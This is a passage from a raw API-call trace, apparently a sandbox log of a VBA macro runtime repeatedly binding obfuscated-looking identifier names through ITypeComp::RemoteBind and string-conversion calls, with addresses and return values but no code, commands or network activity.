CRetailMalloc_Free () returned 0x6410301 [0060.040] CRetailMalloc_Realloc () returned 0x888fc70 [0060.040] ITypeComp:RemoteBind (in: This=0x87ce890, szName="GyH1SboAn", lHashVal=0x10e07d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x238 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x238) returned 0x0 [0060.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48527e2, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="GyH1SboAn") returned 10 [0060.040] ITypeComp:RemoteBind (in: This=0x87ce668, szName="GyH1SboAn", lHashVal=0x10e07d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x238 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x238) returned 0x0 [0060.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48527e2, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="GyH1SboAn") returned 10 [0060.040] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="GyH1SboAn", lHashVal=0x10e07d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x238 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x238) returned 0x0 [0060.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48527e2, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="GyH1SboAn") returned 10 [0060.041] ITypeComp:RemoteBind (in: This=0x87cef08, szName="GyH1SboAn", lHashVal=0x10e07d, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x238 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x238) returned 0x0 [0060.041] CRetailMalloc_Alloc () returned 0x87504e0 [0060.041] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x48527e2 | out: _Dst=0x87504e0) returned 0x0 [0060.042] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701186, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_GyH1SboAn") returned 17 [0060.042] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_GyH1SboAn", lHashVal=0x10da41, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.042] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x48527e2 | out: _Dst=0x34767c) returned 0x0 [0060.042] CRetailMalloc_Free () returned 0xcae0401 [0060.062] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Cf9HUID", lHashVal=0x10b944, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x23a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x23a) returned 0x0 [0060.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485280a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Cf9HUID") returned 8 [0060.062] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Cf9HUID", lHashVal=0x10b944, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x23a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x23a) returned 0x0 [0060.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485280a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Cf9HUID") returned 8 [0060.062] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Cf9HUID", lHashVal=0x10b944, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x23a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x23a) returned 0x0 [0060.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485280a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="Cf9HUID") returned 8 [0060.063] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Cf9HUID", lHashVal=0x10b944, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x23a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x23a) returned 0x0 [0060.063] CRetailMalloc_Alloc () returned 0x87fc470 [0060.063] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x485280a | out: _Dst=0x87fc470) returned 0x0 [0060.064] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57011b6, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_Cf9HUID") returned 15 [0060.064] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Cf9HUID", lHashVal=0x10bcc8, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.064] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x485280a | out: _Dst=0x34767c) returned 0x0 [0060.064] CRetailMalloc_Free () returned 0x6140301 [0060.064] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Dn5Jjy", lHashVal=0x10f0e0, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x23c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x23c) returned 0x0 [0060.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485282e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="Dn5Jjy") returned 7 [0060.064] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Dn5Jjy", lHashVal=0x10f0e0, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x23c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x23c) returned 0x0 [0060.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485282e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="Dn5Jjy") returned 7 [0060.065] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Dn5Jjy", lHashVal=0x10f0e0, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x23c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x23c) returned 0x0 [0060.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485282e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="Dn5Jjy") returned 7 [0060.065] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Dn5Jjy", lHashVal=0x10f0e0, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x23c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x23c) returned 0x0 [0060.065] CRetailMalloc_Alloc () returned 0x87fc470 [0060.065] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x485282e | out: _Dst=0x87fc470) returned 0x0 [0060.066] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57011e2, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_Dn5Jjy") returned 14 [0060.066] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Dn5Jjy", lHashVal=0x106b4a, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.066] CRetailMalloc_Realloc () returned 0x76fc6a8 [0060.066] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x485282e | out: _Dst=0x34767c) returned 0x0 [0060.066] CRetailMalloc_Free () returned 0x6140301 [0060.066] ITypeComp:RemoteBind (in: This=0x87ce890, szName="DsuBnQ", lHashVal=0x1055a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x23e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x23e) returned 0x0 [0060.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852852, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="DsuBnQ") returned 7 [0060.067] ITypeComp:RemoteBind (in: This=0x87ce668, szName="DsuBnQ", lHashVal=0x1055a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x23e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x23e) returned 0x0 [0060.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852852, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="DsuBnQ") returned 7 [0060.067] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="DsuBnQ", lHashVal=0x1055a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x23e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x23e) returned 0x0 [0060.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852852, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="DsuBnQ") returned 7 [0060.067] ITypeComp:RemoteBind (in: This=0x87cef08, szName="DsuBnQ", lHashVal=0x1055a5, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x23e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x23e) returned 0x0 [0060.068] CRetailMalloc_Alloc () returned 0x87fc470 [0060.068] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852852 | out: _Dst=0x87fc470) returned 0x0 [0060.068] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570120e, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_DsuBnQ") returned 14 [0060.068] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_DsuBnQ", lHashVal=0x10d04e, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.068] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852852 | out: _Dst=0x34767c) returned 0x0 [0060.069] CRetailMalloc_Free () returned 0x6140301 [0060.069] ITypeComp:RemoteBind (in: This=0x87ce890, szName="uWvzGiTHB", lHashVal=0x109c91, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x240 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x240) returned 0x0 [0060.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852876, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="uWvzGiTHB") returned 10 [0060.069] ITypeComp:RemoteBind (in: This=0x87ce668, szName="uWvzGiTHB", lHashVal=0x109c91, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x240 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x240) returned 0x0 [0060.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852876, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="uWvzGiTHB") returned 10 [0060.069] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="uWvzGiTHB", lHashVal=0x109c91, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x240 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x240) returned 0x0 [0060.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852876, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="uWvzGiTHB") returned 10 [0060.070] ITypeComp:RemoteBind (in: This=0x87cef08, szName="uWvzGiTHB", lHashVal=0x109c91, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x240 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x240) returned 0x0 [0060.070] CRetailMalloc_Alloc () returned 0x87504e0 [0060.070] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x4852876 | out: _Dst=0x87504e0) returned 0x0 [0060.071] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570123a, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_uWvzGiTHB") returned 17 [0060.071] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_uWvzGiTHB", lHashVal=0x10a5d6, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.071] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852876 | out: _Dst=0x34767c) returned 0x0 [0060.071] CRetailMalloc_Free () returned 0xcae0401 [0060.071] ITypeComp:RemoteBind (in: This=0x87ce890, szName="fIbMi", lHashVal=0x10241b, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x244 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x244) returned 0x0 [0060.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48528c6, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="fIbMi") returned 6 [0060.071] ITypeComp:RemoteBind (in: This=0x87ce668, szName="fIbMi", lHashVal=0x10241b, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x244 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x244) returned 0x0 [0060.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48528c6, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="fIbMi") returned 6 [0060.071] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="fIbMi", lHashVal=0x10241b, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x244 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x244) returned 0x0 [0060.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48528c6, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="fIbMi") returned 6 [0060.072] ITypeComp:RemoteBind (in: This=0x87cef08, szName="fIbMi", lHashVal=0x10241b, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x244 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x244) returned 0x0 [0060.072] CRetailMalloc_Alloc () returned 0x87fc470 [0060.072] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x48528c6 | out: _Dst=0x87fc470) returned 0x0 [0060.073] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570126a, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_fIbMi") returned 13 [0060.073] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_fIbMi", lHashVal=0x10e847, wFlags=0x3, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.073] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x48528c6 | out: _Dst=0x34767c) returned 0x0 [0060.073] CRetailMalloc_Free () returned 0x6140301 [0060.073] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Cqg0ZRClX", lHashVal=0x102ff7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x242 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x242) returned 0x0 [0060.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485289e, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="Cqg0ZRClX") returned 10 [0060.073] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Cqg0ZRClX", lHashVal=0x102ff7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x242 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x242) returned 0x0 [0060.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485289e, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="Cqg0ZRClX") returned 10 [0060.073] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Cqg0ZRClX", lHashVal=0x102ff7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x242 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x242) returned 0x0 [0060.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x485289e, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="Cqg0ZRClX") returned 10 [0060.075] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Cqg0ZRClX", lHashVal=0x102ff7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x242 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x242) returned 0x0 [0060.075] CRetailMalloc_Alloc () returned 0x87504e0 [0060.075] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x485289e | out: _Dst=0x87504e0) returned 0x0 [0060.076] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701296, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_Cqg0ZRClX") returned 17 [0060.076] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Cqg0ZRClX", lHashVal=0x1029bb, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.076] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x485289e | out: _Dst=0x34767c) returned 0x0 [0060.076] CRetailMalloc_Free () returned 0xcae0401 [0060.076] ITypeComp:RemoteBind (in: This=0x87ce890, szName="rgYxRJcA", lHashVal=0x101272, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x246 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x246) returned 0x0 [0060.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48528ea, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="rgYxRJcA") returned 9 [0060.076] ITypeComp:RemoteBind (in: This=0x87ce668, szName="rgYxRJcA", lHashVal=0x101272, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x246 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x246) returned 0x0 [0060.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48528ea, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="rgYxRJcA") returned 9 [0060.076] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="rgYxRJcA", lHashVal=0x101272, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x246 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x246) returned 0x0 [0060.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x48528ea, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="rgYxRJcA") returned 9 [0060.077] ITypeComp:RemoteBind (in: This=0x87cef08, szName="rgYxRJcA", lHashVal=0x101272, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x246 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x246) returned 0x0 [0060.077] CRetailMalloc_Alloc () returned 0x87fc470 [0060.077] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x48528ea | out: _Dst=0x87fc470) returned 0x0 [0060.078] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57012c6, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_rgYxRJcA") returned 16 [0060.078] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_rgYxRJcA", lHashVal=0x10ea3a, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, 